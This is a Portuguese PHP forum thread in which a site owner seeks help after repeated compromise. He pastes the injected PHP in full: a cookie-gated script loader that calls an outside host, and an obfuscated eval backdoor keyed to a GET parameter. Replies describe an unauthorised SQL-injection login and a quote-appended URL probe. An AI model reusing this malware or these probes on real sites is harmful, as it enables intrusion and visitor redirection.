Jump to content


Photo

Site Hacked

Started By georgewar, 13/09/2012, 13:05

  • Faça o login para participar
3 replies to this topic

#1 georgewar

georgewar

    Let's upgrade myself

  • Usuários
  • 169 posts
  • Sexo:Masculino
  • Localidade:Rio de Janeiro - RJ
  • Interesses:PHP - JavaScript

Posted 13/09/2012, 13:52

Boa tarde, possuo um site http://www.adufu.org.br do qual nos últimos meses vêm sendo atacado por hackers. Os links são modificados sendo o usuário levado à paginas pornograficas e etc. O servidor é Dreamhost desde 2009.

Basicamente não consigo descobrir qual a brecha que eles estão usando. Eles conseguem alterar o código dos arquivos existentes, adicionando uma parte maliciosa além dar upload de novos arquivos.

Já troquei senhas de FTP, SHELL e etc.

Como solução paliativa eu fico trocando os arquivos infectados pelos de backup e apagando os arquivos adicionais que aparecem no FTP.

Alguém poderia me ajudar?

em cada arquivo adicionaram esse código

global $wcfseto;if(!$wcfseto) {$wcfseto = 1;$wcfsetk = "kbtm23";if(!@$_COOKIE[$wcfsetk]) {$wcfsetf = "402";if(!@headers_sent()) {@setcookie($wcfsetk,$wcfsetf);} else {echo "<script>document.cookie='".$wcfsetk."=".$wcfsetf."';</script>";}} else {if($_COOKIE[$wcfsetk]=="402") {$wcfsetf = rand(1111,9999);if(!@headers_sent()) {@setcookie($wcfsetk,$wcfsetf);} else {echo "<script>document.cookie='".$wcfsetk."=".$wcfsetf."';</script>";}$wcfsetj = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"];$wcfsetv = urlencode($wcfsetj);$wcfsetu = "http://www.bielka.fr/js/?tm=".$wcfsetf.strrev(substr($wcfsetv,0,320));echo "<script src='$wcfsetu'></script>";}}}																																																																																														 if(isset($_GET["t2122n"])){ $d=substr(8,1);foreach(array(36,112,61,64,36,95,80,79,83,84,91,39,112,49,39,93,59,36,109,61,115,112,114,105,110,116,102,40,34,37,99,34,44,57,50,41,59,105,102,40,115,116,114,112,111,115,40,36,112,44,34,36,109,36,109,34,41,41,123,36,112,61,115,116,114,105,112,115,108,97,115,104,101,115,40,36,112,41,59,125,111,98,95,115,116,97,114,116,40,41,59,101,118,97,108,40,36,112,41,59,36,116,101,109,112,61,34,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,115,116,121,108,101,46,100,105,115,112,108,97,121,61,39,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,105,110,110,101,114,72,84,77,76,61,39,34,46,97,100,100,99,115,108,97,115,104,101,115,40,104,116,109,108,115,112,101,99,105,97,108,99,104,97,114,115,40,111,98,95,103,101,116,95,99,108,101,97,110,40,41,41,44,34,92,110,92,114,92,116,92,92,39,92,48,34,41,46,34,39,59,92,110,34,59,101,99,104,111,40,115,116,114,108,101,110,40,36,116,101,109,112,41,46,34,92,110,34,46,36,116,101,109,112,41,59,101,120,105,116,59)as$c){$d.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$c);}eval($d); exit; }

#2 shayllis

shayllis

    12 Horas

  • Usuários
  • 152 posts
  • Sexo:Masculino
  • Localidade:Barueri - SP
  • Interesses:PHP, MySQL, ASP.NET C# e VB, DreamWeaver, VisualStudio, JavaScript

Posted 15/09/2012, 22:34

na vrdad sua falha é a mais básica de todas... injeção SQL...acabei de logar indevidamente no seu sistema XD .... na área de login....
Descobri o link tbm p login http://www.adufu.org.br/admin/
Tenta algo simples... criptografar o acesso da senha e do usuário... ou aplicar alguma regra... como addslashs, ou htmlspecialchars

#3 georgewar

georgewar

    Let's upgrade myself

  • Usuários
  • 169 posts
  • Sexo:Masculino
  • Localidade:Rio de Janeiro - RJ
  • Interesses:PHP - JavaScript

Posted 18/09/2012, 09:59

na vrdad sua falha é a mais básica de todas... injeção SQL...acabei de logar indevidamente no seu sistema XD .... na área de login....
Descobri o link tbm p login http://www.adufu.org.br/admin/
Tenta algo simples... criptografar o acesso da senha e do usuário... ou aplicar alguma regra... como addslashs, ou htmlspecialchars


amigo, poderia me dizer o que vc fez com mais detalhes para que eu possa solucionar com mais precisão?
meu e-mail (msn) georgewar@gmail.com

amigo, basicamente eu fiz uma correção com mysql_real_escape_string

mas o $_POST eu estava usando apenas para o username, obtendo os dados do usuário e checando com md5.

Se alguem mais achar uma brecha eu agradeço!!

#4 pyro3x

pyro3x

    E

  • Usuários
  • 201 posts
  • Sexo:Masculino

Posted 20/09/2012, 23:22

Verifique a permissão dos seus arquivos, não saia colocando 777 para todos, isso é perigoso.

E faça uma varredura geral no seu sistema, talvez exista alguma vulnerabilidade que permite um injection via sql.



Tratar os parametros que você passa via get, também é aconselhavel:

http://www.adufu.org.br/noticias/496'

Gera um erro:
Fatal error: Call to a member function FetchRow() on a non-object in /home/adufu/adufu.org.br/noticias.php on line 14

Abraço.

Edição feita por: pyro3x, 20/09/2012, 23:26.

Voltar para PHP


1 user(s) are reading this topic

0 membro(s), 1 visitante(s) e 0 membros anônimo(s)

  1. Fórum WMO
  2. Desenvolvimento
  3. PHP
  4. Privacy Policy
  5. Regras ·
IPB Skin By Virteq